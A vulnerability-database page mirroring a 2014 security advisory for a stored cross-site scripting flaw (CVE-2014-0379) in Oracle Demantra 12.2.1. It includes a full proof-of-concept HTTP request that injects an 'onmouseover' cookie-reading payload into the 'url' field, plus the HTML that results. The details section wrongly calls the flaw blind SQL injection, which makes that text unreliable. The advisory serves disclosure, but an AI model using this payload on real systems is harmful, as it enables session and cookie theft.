Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Demantra 12.2.1 Stored Cross Site Scripting

🗓️ 02 Mar 2014 00:00:00Reported by Oliver GruskovnjakType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 51 Views

Stored Cross-site Scripting in Oracle Demantra 12.2.1, potential for data extraction and modificatio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Oracle Demantra 12.2.1 - Stored XSS Vulnerability
1 Mar 201400:00
zdt
Circl		CVE-2014-0379
1 Mar 201400:00
circl
CVE		CVE-2014-0379
15 Jan 201401:33
cve
Cvelist		CVE-2014-0379
15 Jan 201401:33
cvelist
NVD		CVE-2014-0379
15 Jan 201416:08
nvd
Oracle		Oracle Critical Patch Update - January 2014
14 Jan 201400:00
oracle
Oracle		Oracle Critical Patch Update - January 2014
14 Jan 201400:00
oracle
Prion		Buffer overflow
15 Jan 201416:08
prion
securityvulns		Oracle / Sun / MySQL / PeopleSoft / OpenJDK applications multiple security vulnerabilities
5 May 201400:00
securityvulns
ThreatPost		Four Oracle Demantra Security Vulnerabilities Found
3 Mar 201414:08
threatpost
Rows per page
`Vulnerability title: Stored Cross-site Scripting in Oracle Demantra  
CVE: CVE-2014-0379  
Vendor: Oracle  
Product: Demantra  
Affected version: 12.2.1  
Fixed version: 12.2.3  
Reported by: Oliver Gruskovnjak  
  
Details:  
  
The Oracle Demantra application is vulnerable to SQL injection.  
  
An attacker with access to the vulnerable pages could manipulate the  
queries being sent to the database, potentially enabling them to extract  
sensitive information or modify content within the application.  
  
In this particular instance, exploitation was more difficult as the  
results of the attack had to inferred based on the pages returned, often  
referred to as "blind" SQL Injection.  
  
Exploit:  
  
Request:  
  
POST /demantra/TaskSender HTTP/1.1  
Host: www.target.com:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://www.target.com:8080/demantra/portal/taskSender.jsp?tkn=187120466014305  
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=201BE9D6A85EA3E4BC837A4F01B9781F  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------12454397315614820331578362291  
Content-Length: 3093  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="selectedUsersVector"  
  
389  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="selectedUserList"  
  
389;  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="message"  
  
asdasda  
----------97315614820331578362291  
Content-Disposition: form-data; name="description"  
  
asdasdasdas  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="url"  
  
aaa"onmouseover="alert(document.cookie)  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="sendEmail"  
  
1  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_dueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_alertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_dueTimeHours"  
  
14:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_alertTimeHours"  
  
08:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_escalateUserList"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="combination"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="dueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="alertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="tkn"  
  
187120466014305  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="attachment"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="localizedDueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="dueTimeHours"  
  
14:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="localizedAlertTime"  
  
08/02/2013  
---------------12454397315614820331578362291  
Content-Disposition: form-data; name="alertTimeHours"  
  
08:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="escalateUserList"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="sendEmailCheckbox"  
  
on  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="x"  
  
50  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="y"  
  
7  
-----------------------------12454397315614820331578362291--  
  
Resulting Code in page:  
  
<!-- Message -->  
  
<td class="columnCellMessage">  
  
<a href="http://aaa"onmouseover="alert(document.cookie)" id="link793546" class="message" target="_blank">  
  
<b>asdasda</b>  
  
  
  
  
Further details at:  
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0379/  
  
  
Copyright:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
  
Disclaimer:  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Mar 2014 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.36094
oracle demantrasql injectioncross-site scriptingdata extractiondata modification
51